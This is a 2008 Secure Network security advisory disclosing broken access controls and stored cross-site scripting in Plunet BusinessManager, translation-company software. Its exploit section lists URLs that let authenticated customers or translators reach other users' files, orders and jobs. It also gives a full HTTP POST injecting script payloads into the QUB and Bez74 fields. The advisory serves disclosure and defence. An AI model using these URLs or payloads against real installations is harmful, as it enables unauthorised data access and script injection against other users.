Plunet BusinessManager failure in access controls and multiple stored cross site scripting
Secure Network - Security Research Advisory
Vuln name: Failure in Access Controls; multiple Stored Cross Site Scripting
vulnerabilities.
Systems affected: Plunet BusinessManager
Systems not affected:
Severity: High
Local/Remote: Remote
Vendor URL: http://www.plunet.de
Author(s): Matteo Ignaccolo m.ignaccolo@xxxxxxxxxxxxxxxx - Gabriele Zanoni
g.zanoni@xxxxxxxxxxxxxxxx
Relates to:
Vendor disclosure: 23/09/2008
Vendor acknowledged:
Vendor patch release:
Public disclosure: 23/12/2008
Advisory number: SN-2008-04
Advisory URL: http://www.securenetwork.it/advisories/
*** SUMMARY ***
Plunet BusinessManager is a powerful software for traslation companies, that
offers on a single platform a solution to handle customers, traslators,
document management, data, order management e processing.
Since Plunet BusinessManager suffers of incorrect validation of some input
forms, Stored Cross Site Scripting attacks are allowed.
Moreover customers and traslators can access data and file not related to
them.
*** VULNERABILITY DETAILS ***
The application fails to perform a correct access control to data and file.
Any user (Customers and Traslators) colud retrive and alter data and
file not related to him. Also, an user could be easily enumerate all Company
customers.
The application fails to validate QUB and Bez74 parameters, so stored Cross
Site
Scripting attacks are possible.
*** EXPLOIT ***
An authenticated Customer could use the following URL to access to other
Customers private area.
http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=&Pfad=/Customer/
<CUSTOMER-ID>
An authenticated Traslator could use the following URL to access Orders not
related to him
http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/
C-00042/PRM
An authenticated traslator could use the following URL to access to Jobs not
related to him
http://domain/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs
Stored Cross Site Scripting
POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1
Host: <HOSTNAME> or IP
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16)
Gecko/20080718
Ubuntu/8.04 (hardy) Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://<hostname or IP>/pagesUTF8/auftrag_allgemeinauftrag.jsp
Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D
Content-Type: application/x-www-form-urlencoded
Content-Length: 1085
TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&
VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29
%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14
&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&
DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&
Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&
LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&
LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&
OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&
REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=
&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&
CheckXYZ=Send&yOffsetScroll=0
*** FIX INFORMATION ***
No patch is currently available.
*** WORKAROUNDS ***
No workaround is available, but some application firewalls and IPS can be
reconfigured to thwart the attack.
*********************
*** LEGAL NOTICES ***
*********************
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.
This advisory is copyright 2008 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network.
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: securenetwork@xxxxxxxxxxxxxxxx
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88
--
Dott. Ing. Matteo Ignaccolo
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788
email: m.ignaccolo@xxxxxxxxxxxxxxxx
web: www.securenetwork.it
--
Dott. Ing. Matteo Ignaccolo
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788
email: m.ignaccolo@xxxxxxxxxxxxxxxx
web: www.securenetwork.it